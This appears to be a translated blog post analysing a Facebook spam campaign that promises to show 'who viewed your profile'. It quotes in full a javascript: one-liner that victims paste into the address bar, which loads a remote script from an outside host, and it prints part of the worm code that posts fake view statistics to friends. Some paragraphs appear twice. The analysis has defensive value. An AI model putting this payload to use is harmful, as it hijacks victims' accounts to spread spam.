A new wave of spam on Facebook
Today on Facebook, a wave of spam went with the theme “How to see who viewed your profile !!”. It is distributed in three ways:
The goal of all three methods is to drive the attacked user to the site http://iamnewc.blogspot.com/ , which is hiding behind a shortcut of GoDaddy x.co urls at http://x.co/WlL4/?$PARAM , where $ PARAM is a certain number, apparently associated with the user of facebook, to understand who pecked.
The further one resembles the social engineering method used in another recent sensational phishing attack on Facebook users: they suggest copying the JavaScript code to the clipboard, go to Facebook and execute it (by pasting it into the address bar and pressing Enter): And from this page ( http://bbbindia4.in/jsp.php ), in turn, is loaded and executed: Update
The urls mentioned in the last fragment, abbreviated from x.co no longer work; possibly removed by GoDaddy Security. But at www.gameindiagame.blogspot.com you can go at least to admire the inscription Facebook Verification Spam Bot :). Naturally, it’s better to go in incognito mode.
- IM messages if the attacked user is online
- Tagging users in a post with statistics on viewing an infected user (of course, statistics are fake, in the spirit of the scam “Read someone else’s sms” and “Look at the history of user’s movements”
- Invitation to an event (event).
The goal of all three methods is to drive the attacked user to the site http://iamnewc.blogspot.com/ , which is hiding behind a shortcut of GoDaddy x.co urls at http://x.co/WlL4/?$PARAM , where $ PARAM is a certain number, apparently associated with the user of facebook, to understand who pecked.
The further one resembles the social engineering method used in another recent sensational phishing attack on Facebook users: they suggest copying the JavaScript code to the clipboard, go to Facebook and execute it (by pasting it into the address bar and pressing Enter): And from this page ( http://bbbindia4.in/jsp.php ), in turn, is loaded and executed: Update
javascript:(a=(b=document).createElement('script')).src='// bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
var randomnumber=Math.floor(Math.random()*99999); var randomnumber1=Math.floor(Math.random()*987); var randomnumber2=Math.floor(Math.random()*754); var randomnumber3=Math.floor(Math.random()*43); var randomnumber4=Math.floor(Math.random()*9); var random=Math.floor(Math.random()*5); if (random == 1) { var url = ' x.co/WleP?' } else if (random == 2) { var url = 'http://x.co/WleV/?' } else if (random == 3) { var url = 'http://x.co/Wled/?' } else if (random == 4) { var url = 'http://x.co/Wlek/?' } else { var url = 'http://x.co/Wlem/?' } var message = '%firstname% See who views your profile '; var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http:// www.gameindiagame.blogspot.com'; var eventdesc = ev + url + randomnumber; var eventname = 'How to see who viewed your profile!!'; var nfriends = 5000; //
The urls mentioned in the last fragment, abbreviated from x.co no longer work; possibly removed by GoDaddy Security. But at www.gameindiagame.blogspot.com you can go at least to admire the inscription Facebook Verification Spam Bot :). Naturally, it’s better to go in incognito mode.